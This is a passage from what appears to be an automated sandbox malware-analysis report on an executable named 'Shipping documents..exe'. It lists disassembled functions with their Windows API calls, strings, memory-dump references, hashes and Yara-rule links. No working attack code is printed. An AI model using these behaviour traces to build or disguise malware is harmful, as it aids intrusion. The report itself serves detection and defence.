                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                          • String ID: -----$SysListView32
                                                                                                          • API String ID: 4008455318-3975388722
                                                                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                                                          Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                          • GetParent.USER32 ref: 00469C98
                                                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                          • GetParent.USER32 ref: 00469CBC
                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 2360848162-1403004172
                                                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                                                          Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                          • String ID:
                                                                                                          • API String ID: 262282135-0
                                                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                                                          Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 312131281-0
                                                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                                                          Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                          • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                                                          • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3771399671-0
                                                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                          Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                          • String ID:
                                                                                                          • API String ID: 2156557900-0
                                                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                          Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                          • API String ID: 0-1603158881
                                                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                          Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                          • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                          • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                          • String ID: close all$#v
                                                                                                          • API String ID: 4174999648-3101823635
                                                                                                          • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                          • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                          • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                          • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                          Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateMenu.USER32 ref: 00448603
                                                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 161812096-4108050209
                                                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                          Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Shipping documents..exe), ref: 00434057
                                                                                                          • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                          • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                          • _wprintf.LIBCMT ref: 004340A1
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                          Strings
                                                                                                          • C:\Users\user\Desktop\Shipping documents..exe, xrefs: 00434040
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 3648134473-869968937
                                                                                                          • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                          • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                          • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                          • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                          Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                          • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                          Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                          Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 978794511-0
                                                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                          Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
